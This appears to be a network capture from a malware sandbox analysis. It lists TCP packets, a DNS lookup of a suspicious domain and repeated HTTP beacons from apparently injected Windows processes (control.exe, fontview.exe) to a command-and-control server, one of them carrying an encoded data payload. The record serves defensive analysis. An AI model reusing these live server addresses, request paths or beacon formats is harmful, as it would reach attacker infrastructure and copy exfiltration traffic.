                                                    Jan 2, 2025 09:28:28.208077908 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:28.256999016 CET804970547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:28.258307934 CET4970580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.238224030 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.243191957 CET804970647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:33.243277073 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.243375063 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.248431921 CET804970647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:33.248488903 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.253350973 CET804970647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:33.711718082 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:33.763279915 CET804970647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:33.837513924 CET804970647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:33.837609053 CET4970680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:38.738611937 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:38.743540049 CET804970747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:38.743664026 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:38.743731976 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:38.748577118 CET804970747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:38.748632908 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:38.753388882 CET804970747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:39.118031979 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:39.163342953 CET804970747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:39.322598934 CET804970747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:39.322685957 CET4970780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.147813082 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.152880907 CET804971247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:44.152993917 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.160310984 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.165149927 CET804971247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:44.165363073 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.170165062 CET804971247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:44.524333000 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:44.575218916 CET804971247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:44.739018917 CET804971247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:44.739145994 CET4971280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.083991051 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.088819981 CET804974547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:51.092416048 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.092489004 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.097261906 CET804974547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:51.100594997 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.105483055 CET804974547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:51.461958885 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:51.507374048 CET804974547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:51.677004099 CET804974547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:51.677134037 CET4974580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.445458889 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.450391054 CET804978047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:56.450546026 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.450787067 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.455874920 CET804978047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:56.455946922 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.461308956 CET804978047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:56.821347952 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:28:56.867238045 CET804978047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:57.034246922 CET804978047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:28:57.034332991 CET4978080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:01.848031998 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:01.852993965 CET804981547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:01.854320049 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:01.854408979 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:01.859204054 CET804981547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:01.859281063 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:01.864212036 CET804981547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:02.227659941 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:02.275218010 CET804981547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:02.441021919 CET804981547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:02.441097021 CET4981580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.253690004 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.258513927 CET804985047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:07.258591890 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.258675098 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.263433933 CET804985047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:07.263497114 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.268352032 CET804985047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:07.635191917 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:07.687275887 CET804985047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:07.847598076 CET804985047.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:07.850141048 CET4985080192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:12.675941944 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:12.680811882 CET804988347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:12.680933952 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:12.680989981 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:12.685743093 CET804988347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:12.685796022 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:12.690568924 CET804988347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:13.056684971 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:13.103224993 CET804988347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:13.265089989 CET804988347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:13.265217066 CET4988380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.453357935 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.458220959 CET804991947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:19.458345890 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.458445072 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.463227987 CET804991947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:19.463282108 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.468043089 CET804991947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:19.821326971 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:19.867286921 CET804991947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:20.062026978 CET804991947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:20.062190056 CET4991980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:24.653476000 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:24.658401966 CET804995647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:24.658533096 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:24.658730030 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:24.663511992 CET804995647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:24.663598061 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:24.668384075 CET804995647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:25.024789095 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:25.075211048 CET804995647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:25.232357979 CET804995647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:25.232458115 CET4995680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.052290916 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.057164907 CET804998747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:30.057281971 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.057358980 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.062170029 CET804998747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:30.062263012 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.067018986 CET804998747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:30.446345091 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:30.495177984 CET804998747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:30.643738031 CET804998747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:30.643922091 CET4998780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.481987953 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.487520933 CET804998847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:35.487683058 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.487802029 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.492656946 CET804998847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:35.492857933 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.497715950 CET804998847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:35.852691889 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:35.899207115 CET804998847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:36.124754906 CET804998847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:36.124864101 CET4998880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:40.879091978 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:40.883919001 CET804998947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:40.884044886 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:40.884139061 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:40.889457941 CET804998947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:40.889568090 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:40.894391060 CET804998947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:41.259040117 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:41.307221889 CET804998947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:41.462749958 CET804998947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:41.462810040 CET4998980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:46.638694048 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:46.643680096 CET804999147.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:46.643908024 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:46.644011974 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:46.648869038 CET804999147.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:46.648941040 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:46.653805971 CET804999147.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:47.008842945 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:47.059273005 CET804999147.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:47.220357895 CET804999147.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:47.220662117 CET4999180192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.224584103 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.229433060 CET804999247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:51.229518890 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.230673075 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.235652924 CET804999247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:51.235726118 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.240473032 CET804999247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:51.775388956 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:51.812424898 CET804999247.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:51.812536955 CET4999280192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:56.817442894 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:56.822391987 CET804999347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:56.822525978 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:56.822602987 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:56.827414989 CET804999347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:56.827496052 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:56.832351923 CET804999347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:57.424844027 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:29:57.429987907 CET804999347.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:29:57.430046082 CET4999380192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.456795931 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.461678982 CET804999447.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:02.461781979 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.461817026 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.466593981 CET804999447.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:02.466649055 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.471424103 CET804999447.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:02.836863995 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:02.887245893 CET804999447.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:03.062726974 CET804999447.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:03.062915087 CET4999480192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:07.864052057 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:07.869144917 CET804999547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:07.869252920 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:07.869333029 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:07.874224901 CET804999547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:07.874317884 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:07.879165888 CET804999547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:08.243488073 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:08.291366100 CET804999547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:08.453397036 CET804999547.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:08.453474045 CET4999580192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:14.616816044 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:14.621848106 CET804999647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:14.622060061 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:14.622060061 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:14.626935959 CET804999647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:14.627007961 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:14.631934881 CET804999647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:14.993012905 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:15.039370060 CET804999647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:15.226785898 CET804999647.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:15.227041960 CET4999680192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.093611002 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.098473072 CET804999747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:20.098550081 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.098669052 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.103430986 CET804999747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:20.103477955 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.108253002 CET804999747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:20.461962938 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:20.507297039 CET804999747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:20.712734938 CET804999747.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:20.714472055 CET4999780192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.488251925 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.493257999 CET804999847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:25.493360043 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.493458986 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.498229980 CET804999847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:25.498305082 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.503216028 CET804999847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:25.868252039 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:25.919277906 CET804999847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:26.080015898 CET804999847.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:26.080180883 CET4999880192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:30.895293951 CET4999980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:30.900274992 CET804999947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:30.901372910 CET4999980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:30.901451111 CET4999980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:30.906148911 CET804999947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:30.908499956 CET4999980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:30.913240910 CET804999947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:31.275485992 CET4999980192.168.2.547.76.199.218
                                                    Jan 2, 2025 09:30:31.323371887 CET804999947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:31.501740932 CET804999947.76.199.218192.168.2.5
                                                    Jan 2, 2025 09:30:31.502062082 CET4999980192.168.2.547.76.199.218
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 2, 2025 09:28:26.623742104 CET5978053192.168.2.51.1.1.1
                                                    Jan 2, 2025 09:28:27.593492031 CET53597801.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 2, 2025 09:28:26.623742104 CET192.168.2.51.1.1.10x27b7Standard query (0)api.5566331.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 2, 2025 09:28:27.593492031 CET1.1.1.1192.168.2.50x27b7No error (0)api.5566331.com47.76.199.218A (IP address)IN (0x0001)false
                                                    • 47.76.199.218:80
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.54970547.76.199.218802360C:\Windows\SysWOW64\control.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:27.677767038 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:28:27.682748079 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.54970647.76.199.218802360C:\Windows\SysWOW64\control.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:33.243375063 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:28:33.248488903 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.54970747.76.199.218802360C:\Windows\SysWOW64\control.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:38.743731976 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:28:38.748632908 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.54971247.76.199.218802360C:\Windows\SysWOW64\control.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:44.160310984 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:28:44.165363073 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 34 34 39 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.54974547.76.199.218802360C:\Windows\SysWOW64\control.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:51.092489004 CET659OUTGET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfm*BM8ui63qGw1hOYc0Maww2aCZlGFx2c*WqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 508
                                                    Jan 2, 2025 09:28:51.100594997 CET508OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 49 6e 64 65 78 6e 65 77 3f 64 3d 31 26 6d 65 6d 62 65 72 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 73 74 61 6d 70 74 69 6d 65 3d 31 37 33 35 38 30 36 35 35 31 26 64 61 74 61 3d 78 33
                                                    Data Ascii: /index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAK


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.54978047.76.199.218805772C:\Windows\SysWOW64\fontview.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:28:56.450787067 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
                                                    Jan 2, 2025 09:28:56.455946922 CET85OUTData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 69 6e 66 61 63 65 2f 48 65 61 72 74 2f 67 65 74 43 6f 6e 66 69 67 44 79 6e 3f 6d 5f 69 64 3d 35 35 35 70 72 63 34 78 6e 75 70 64 26 6d 65 6d 62 65 72 5f 69 64 3d 38 35 34 37 26 74 69 6d 65 3d 31 37 33 35 38 30 36
                                                    Data Ascii: /index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.54981547.76.199.218805772C:\Windows\SysWOW64\fontview.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 2, 2025 09:29:01.854408979 CET235OUTGET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1
                                                    Host: 47.76.199.218:80
                                                    Content-type: application/x-www-form-urlencoded
                                                    Accept: text/plain
                                                    Content-Length: 85
